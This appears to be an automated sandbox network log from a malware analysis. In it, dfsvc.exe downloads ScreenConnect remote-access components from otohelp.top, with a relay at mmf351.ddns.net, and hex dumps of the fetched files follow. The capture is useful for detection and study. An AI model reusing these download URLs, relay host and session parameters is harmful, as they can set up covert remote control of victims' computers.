Oct 2, 2024 06:22:52.249366999 CEST	1.1.1.1	192.168.2.4	0xb66d	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 06:22:52.249366999 CEST	1.1.1.1	192.168.2.4	0xb66d	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:23:07.824311972 CEST	1.1.1.1	192.168.2.4	0xa98b	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:23:07.824311972 CEST	1.1.1.1	192.168.2.4	0xa98b	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

otohelp.top

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	79.110.49.16	443	5812	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:22:49 UTC	623	OUT	GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=89e470af-f42d-4b2f-ad1d-717711c7c76a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip Connection: Keep-Alive
2024-10-02 04:22:49 UTC	251	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 118084 Content-Type: application/x-ms-application; charset=utf-8 Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:22:49 GMT Connection: close
2024-10-02 04:22:49 UTC	16133	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
2024-10-02 04:22:50 UTC	16384	IN	Data Raw: 47 6c 69 52 47 38 79 66 59 52 6f 64 77 71 45 6c 46 44 4c 68 4b 54 47 45 6b 53 6b 48 75 45 45 6c 4f 31 6d 42 49 59 67 77 51 54 4d 39 72 37 45 35 69 6e 4a 52 53 58 55 49 59 55 79 31 33 46 46 43 58 6b 4e 52 56 67 42 49 49 56 64 59 61 51 46 57 34 36 48 68 59 43 77 4a 63 57 48 61 72 43 46 67 30 41 33 42 5a 69 6a 54 45 5a 37 35 39 53 47 39 4a 2f 42 78 37 6a 76 49 67 65 76 55 2b 52 48 6d 39 47 32 52 37 6f 79 66 6f 65 77 58 79 75 48 77 39 4f 45 53 42 36 7a 43 6f 67 4a 72 39 62 49 45 39 4b 4f 79 46 4a 6c 31 59 68 45 58 59 63 49 74 50 52 58 43 4c 58 66 4a 4d 69 37 52 32 79 49 75 4c 43 75 53 4b 59 33 42 51 6a 4e 43 7a 2b 49 2f 2b 4a 57 79 52 67 6f 57 67 6b 77 6a 5a 75 4a 47 48 4c 62 69 51 6a 30 32 38 6b 68 48 35 7a 4a 4c 4a 32 74 43 54 42 31 6d 59 6c 66 59 4e 57 4a Data Ascii: GliRG8yfYRodwqElFDLhKTGEkSkHuEElO1mBIYgwQTM9r7E5inJRSXUIYUy13FFCXkNRVgBIIVdYaQFW46HhYCwJcWHarCFg0A3BZijTEZ759SG9J/Bx7jvIgevU+RHm9G2R7oyfoewXyuHw9OESB6zCogJr9bIE9KOyFJl1YhEXYcItPRXCLXfJMi7R2yIuLCuSKY3BQjNCz+I/+JWyRgoWgkwjZuJGHLbiQj028khH5zJLJ2tCTB1mYlfYNWJ
2024-10-02 04:22:50 UTC	16384	IN	Data Raw: 55 41 62 41 42 4e 41 47 45 41 62 67 42 68 41 47 63 41 5a 51 42 44 41 48 49 41 5a 51 42 6b 41 47 55 41 62 67 42 30 41 47 6b 41 59 51 42 73 41 48 4d 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 43 49 4e 41 41 42 45 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 79 41 47 55 41 5a 41 42 6c 41 47 34 41 64 41 42 70 41 47 45 41 62 41 42 7a 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 42 5a 44 51 41 41 54 45 4d 41 62 77 42 75 41 48 51 41 63 67 42 76 41 47 77 41 55 41 42 68 41 47 34 41 5a 51 42 73 41 45 30 41 59 51 42 75 41 47 45 41 5a 77 42 6c 41 46 41 41 5a 51 42 79 41 48 4d 41 62 77 42 75 41 47 45 41 62 41 42 55 41 Data Ascii: UAbABNAGEAbgBhAGcAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMARABlAHMAYwByAGkAcAB0AGkAbwBuACINAABEQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwByAGUAZABlAG4AdABpAGEAbABzAFQAaQB0AGwAZQBZDQAATEMAbwBuAHQAcgBvAGwAUABhAG4AZQBsAE0AYQBuAGEAZwBlAFAAZQByAHMAbwBuAGEAbABUA
2024-10-02 04:22:50 UTC	16384	IN	Data Raw: 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 63 77 42 45 41 47 6b 41 59 51 42 73 41 47 38 41 5a 77 42 55 41 47 55 41 65 41 42 30 41 45 4d 41 62 77 42 75 41 48 51 41 5a 51 42 75 41 48 51 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 65 79 30 41 41 45 35 4e 41 47 45 41 59 77 42 4a 41 47 34 41 63 77 42 30 41 48 49 41 64 51 42 6a 41 48 51 41 61 51 42 76 41 47 34 41 59 51 42 73 41 45 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 51 41 61 51 42 7a 41 47 30 41 61 51 42 7a 41 48 4d 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 43 4b 4d 51 41 41 51 6b 30 41 59 51 42 6a 41 46 49 41 5a 51 42 70 41 47 34 41 63 77 42 30 41 47 45 41 62 41 42 73 41 46 55 41 62 67 42 70 41 47 34 41 63 77 42 30 41 Data Ascii: AAZQByAG0AaQBzAHMAaQBvAG4AcwBEAGkAYQBsAG8AZwBUAGUAeAB0AEMAbwBuAHQAZQBuAHQARgBvAHIAbQBhAHQAey0AAE5NAGEAYwBJAG4AcwB0AHIAdQBjAHQAaQBvAG4AYQBsAEQAaQBhAGwAbwBnAEQAaQBzAG0AaQBzAHMAQgB1AHQAdABvAG4AVABlAHgAdACKMQAAQk0AYQBjAFIAZQBpAG4AcwB0AGEAbABsAFUAbgBpAG4AcwB0A
2024-10-02 04:22:50 UTC	16384	IN	Data Raw: 4e 6f 62 32 39 7a 5a 53 42 33 61 47 6c 6a 61 43 42 73 62 32 64 76 62 69 42 7a 5a 58 4e 7a 61 57 39 75 49 48 52 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 32 34 67 64 47 68 6c 49 48 4a 6c 62 57 39 30 5a 53 42 74 59 57 4e 6f 61 57 35 6c 4c 67 45 55 55 32 56 73 5a 57 4e 30 49 45 78 76 5a 32 39 75 49 46 4e 6c 63 33 4e 70 62 32 34 42 45 56 4e 6c 62 47 56 6a 64 43 42 4e 61 57 4e 79 62 33 42 6f 62 32 35 6c 41 53 74 44 61 47 39 76 63 32 55 67 62 32 35 6c 49 47 39 79 49 47 31 76 63 6d 55 67 63 6d 56 74 62 33 52 6c 49 47 31 76 62 6d 6c 30 62 33 4a 7a 49 48 52 76 49 48 5a 70 5a 58 63 75 41 51 39 54 5a 57 78 6c 59 33 51 67 54 57 39 75 61 58 52 76 63 6e 4d 42 52 6b 4e 6f 62 32 39 7a 5a 53 42 68 49 47 78 76 64 32 56 79 49 48 46 31 59 57 78 70 64 48 6b 67 61 57 59 67 62 Data Ascii: Nob29zZSB3aGljaCBsb2dvbiBzZXNzaW9uIHRvIGNvbnRyb2wgb24gdGhlIHJlbW90ZSBtYWNoaW5lLgEUU2VsZWN0IExvZ29uIFNlc3Npb24BEVNlbGVjdCBNaWNyb3Bob25lAStDaG9vc2Ugb25lIG9yIG1vcmUgcmVtb3RlIG1vbml0b3JzIHRvIHZpZXcuAQ9TZWxlY3QgTW9uaXRvcnMBRkNob29zZSBhIGxvd2VyIHF1YWxpdHkgaWYgb
2024-10-02 04:22:50 UTC	16384	IN	Data Raw: 47 6c 6a 53 32 56 35 56 47 39 72 5a 57 34 39 59 6a 63 33 59 54 56 6a 4e 54 59 78 4f 54 4d 30 5a 54 41 34 4f 53 4e 54 65 58 4e 30 5a 57 30 75 55 6d 56 7a 62 33 56 79 59 32 56 7a 4c 6c 4a 31 62 6e 52 70 62 57 56 53 5a 58 4e 76 64 58 4a 6a 5a 56 4e 6c 64 41 49 41 41 41 41 43 41 41 41 41 41 41 41 41 41 46 42 42 52 46 42 42 52 46 42 41 56 47 2b 72 76 36 4e 75 58 79 55 41 41 41 41 41 41 41 41 41 4a 67 45 41 41 43 42 42 41 48 41 41 63 41 42 73 41 47 6b 41 59 77 42 68 41 48 51 41 61 51 42 76 41 47 34 41 56 41 42 70 41 48 51 41 62 41 42 6c 41 41 41 41 41 41 41 34 56 51 42 75 41 47 51 41 5a 51 42 79 41 45 4d 41 62 77 42 75 41 48 51 41 63 67 42 76 41 47 77 41 51 67 42 68 41 47 34 41 62 67 42 6c 41 48 49 41 56 41 42 6c 41 48 67 41 64 41 42 47 41 47 38 41 63 67 42 74 Data Ascii: GljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAACAAAAAAAAAFBBRFBBRFBAVG+rv6NuXyUAAAAAAAAAJgEAACBBAHAAcABsAGkAYwBhAHQAaQBvAG4AVABpAHQAbABlAAAAAAA4VQBuAGQAZQByAEMAbwBuAHQAcgBvAGwAQgBhAG4AbgBlAHIAVABlAHgAdABGAG8AcgBt
2024-10-02 04:22:50 UTC	16384	IN	Data Raw: 62 58 63 66 78 30 32 75 67 41 45 67 63 6b 5a 54 75 57 37 77 50 34 73 30 4c 68 44 46 37 69 7a 70 76 30 66 41 59 66 64 78 72 45 58 63 69 4d 55 55 4d 41 43 34 58 4d 67 38 65 36 35 75 46 71 6c 51 73 54 2f 62 52 37 6d 32 69 6f 44 6c 37 4f 4d 34 59 67 6f 59 41 43 4b 6c 4e 5a 69 4b 74 34 50 76 51 2b 68 43 6b 31 61 36 6e 32 53 49 53 73 41 52 4e 32 4b 78 43 42 6f 41 2f 69 54 74 74 53 4f 77 67 2b 39 44 36 47 36 52 49 48 51 2f 79 52 43 58 67 44 50 37 4f 4b 4a 71 78 47 49 49 43 51 41 2b 32 2f 65 30 48 59 6b 65 50 42 39 43 46 33 76 6e 57 48 55 4a 48 4a 65 41 73 2f 73 34 59 6d 72 45 59 67 67 4a 41 47 36 30 34 71 68 39 71 7a 6d 45 37 69 64 6c 53 32 41 45 48 4a 68 62 63 54 5a 69 63 51 49 4e 59 4a 36 4c 77 62 51 64 6c 78 2f 38 48 6b 4b 50 69 67 58 78 64 4a 62 79 64 78 45 Data Ascii: bXcfx02ugAEgckZTuW7wP4s0LhDF7izpv0fAYfdxrEXciMUUMAC4XMg8e65uFqlQsT/bR7m2ioDl7OM4YgoYACKlNZiKt4PvQ+hCk1a6n2SISsARN2KxCBoA/iTttSOwg+9D6G6RIHQ/yRCXgDP7OKJqxGIICQA+2/e0HYkePB9CF3vnWHUJHJeAs/s4YmrEYggJAG604qh9qzmE7idlS2AEHJhbcTZicQINYJ6LwbQdlx/8HkKPigXxdJbydxE
2024-10-02 04:22:50 UTC	3647	IN	Data Raw: 41 48 37 6b 68 41 49 49 59 47 5a 32 4d 69 38 6a 74 41 73 4a 51 41 42 7a 61 61 39 51 46 39 4b 43 58 55 67 41 43 4f 42 63 30 7a 6a 47 73 49 78 77 7a 51 45 46 45 4d 41 6b 70 6e 47 4d 59 52 6d 68 49 6d 67 41 41 55 7a 71 43 6a 79 47 4c 69 52 46 30 41 41 43 6d 4e 51 56 65 41 7a 4c 43 46 38 36 6f 41 41 43 6d 4d 52 41 79 76 67 75 4a 45 58 51 41 41 4b 59 31 45 44 4b 75 66 68 6c 68 49 71 67 41 51 51 77 71 57 6b 63 39 2b 4f 58 45 5a 6f 45 44 53 43 41 53 51 32 6b 48 45 4d 58 6b 69 4a 6f 41 41 46 4d 36 67 72 63 37 30 4a 36 71 77 67 61 41 41 47 63 36 77 72 63 37 30 4a 36 61 42 49 30 41 41 49 34 31 30 44 4b 2b 43 36 6b 56 34 34 6e 67 41 41 6d 4e 59 30 6a 76 67 76 70 30 50 45 45 45 4d 41 6b 70 6e 47 4d 59 52 66 53 73 75 4d 4a 49 49 42 4a 58 49 48 48 73 41 76 70 32 50 45 Data Ascii: AH7khAIIYGZ2Mi8jtAsJQABzaa9QF9KCXUgACOBc0zjGsIxwzQEFEMAkpnGMYRmhImgAAUzqCjyGLiRF0AACmNQVeAzLCF86oAACmMRAyvguJEXQAAKY1EDKufhlhIqgAQQwqWkc9+OXEZoEDSCASQ2kHEMXkiJoAAFM6grc70J6qwgaAAGc6wrc70J6aBI0AAI410DK+C6kV44ngAAmNY0jvgvp0PEEEMAkpnGMYRfSsuMJIIBJXIHHsAvp2PE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	79.110.49.16	443	5812	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:22:51 UTC	93	OUT	GET /Bin/ScreenConnect.Client.manifest HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:22:51 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 17866 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:22:51 GMT Connection: close
2024-10-02 04:22:51 UTC	16168	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
2024-10-02 04:22:51 UTC	1698	IN	Data Raw: 32 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 46 4b 5a 62 53 31 31 30 59 55 Data Ascii: 2q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2FKZbS110YU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49745	79.110.49.16	443	5812	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:22:54 UTC	119	OUT	GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip Connection: Keep-Alive
2024-10-02 04:22:54 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 95520 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:22:53 GMT Connection: close
2024-10-02 04:22:54 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
2024-10-02 04:22:54 UTC	16384	IN	Data Raw: 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 41 00 e9 0f 00 00 00 cc cc cc cc 53 51 bb 30 40 41 00 Data Ascii: ut@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@ASQ0@A
2024-10-02 04:22:54 UTC	16384	IN	Data Raw: ff 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 cc d8 ff ff 8b Data Ascii: ttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF\|t^8uYt8uP0(YYt8uPYYv\|YYtE8u@-P
2024-10-02 04:22:54 UTC	16384	IN	Data Raw: fe 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 08 b9 4d 5a 00 00 66 39 08 75 1d 8b 48 3c 03 c8 81 39 Data Ascii: rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@\|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UEMZf9uH<9
2024-10-02 04:22:54 UTC	16384	IN	Data Raw: 64 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d 00 7a 00 77 00 00 00 65 00 73 00 2d 00 61 00 72 00 00 Data Ascii: de-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
2024-10-02 04:22:54 UTC	13816	IN	Data Raw: 1f 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b Data Ascii: 3033333444(414B4T4o44444/595?5E555557%88P9h9999999999O::;p;{;;;,<<<W======>>>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49748	79.110.49.16	443	5812	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:22:55 UTC	103	OUT	GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:22:55 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 61216 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:22:55 GMT Connection: close
